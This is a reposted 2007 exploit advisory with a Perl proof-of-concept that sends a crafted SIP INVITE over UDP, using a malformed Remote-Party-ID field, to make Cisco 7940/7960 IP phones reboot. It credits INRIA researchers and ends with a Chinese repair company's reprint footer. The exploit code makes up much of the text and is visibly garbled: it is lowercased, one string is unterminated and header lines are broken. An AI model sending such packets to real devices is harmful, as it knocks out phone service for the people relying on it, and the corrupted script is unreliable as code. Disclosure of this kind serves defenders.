Cisco Phone 7940/7960 (SIP INVITE) Remote Denial
#!/usr/bin/perl
# title: cisco 7940 sip invite remote dos
# date: february 19, 2007
# id: kiph2
#
# synopsis: after sending a cra fted invite message the device immediately
# reboots. the phone does not check properly the sipuri field of the
# remote-party-id in the message.
#
# the vendor was informed and acknowledged the vulnerability. this
# vulnerability was identified by the madynes research team at inria
# lorraine, using the madynes voip fuzzer.
#
# background: sip is the ietf standardized (rfcs 2543 and 3261) protocol
# for voip signalization. sip is an ascii based invite message is used to
# initiate and maintain a communication session.
#
# affected devices: cisco phone 7940/7960 running firmware p0s3-07-4-00
#
# unaffected: devices running firmware pos8-6-0
#
# description: after receiving one crafted sip invite message, the
# affected device reboots immediately. the proof of concept code can be
# used to demonstrate the vulnerability.
#
# resolution:
#
# fixed software is available from the vendor and customers following
# recommended best practices (ie segregating voip traffic from data) will
# be protected from malicious traffic in most situations.
#
# credits:
#
# humberto j. abdelnur (ph.d student)
#
# radu state (ph.d)
#
# olivier festor (ph.d)
#
# this vulnerability was identified by the madynes research team at inria
#
# lorraine, using the madynes voip fuzzer.
#
# http://madynes.loria.fr/
use io::socket::inet;
die "usage $0
$socket=new io::socket::inet->new(peerport=>$argv[1],
proto=>'udp',
peeraddr=>$argv[0]);
$msg="invite sip:$argv[2]\@$argv[0] sip/2.0\r\nvia: sip/2.0/udp
192.168.1.2;branch=z9hg4jk\r\nfrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nto:
\ncall-id: fosforito\@192.168.1.1\r\ncseq: 921 invite\r
\nremote-party-id: csip:7940-1\@192.168.\xd1.7\r\n\r\n";
$socket->send($msg);
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
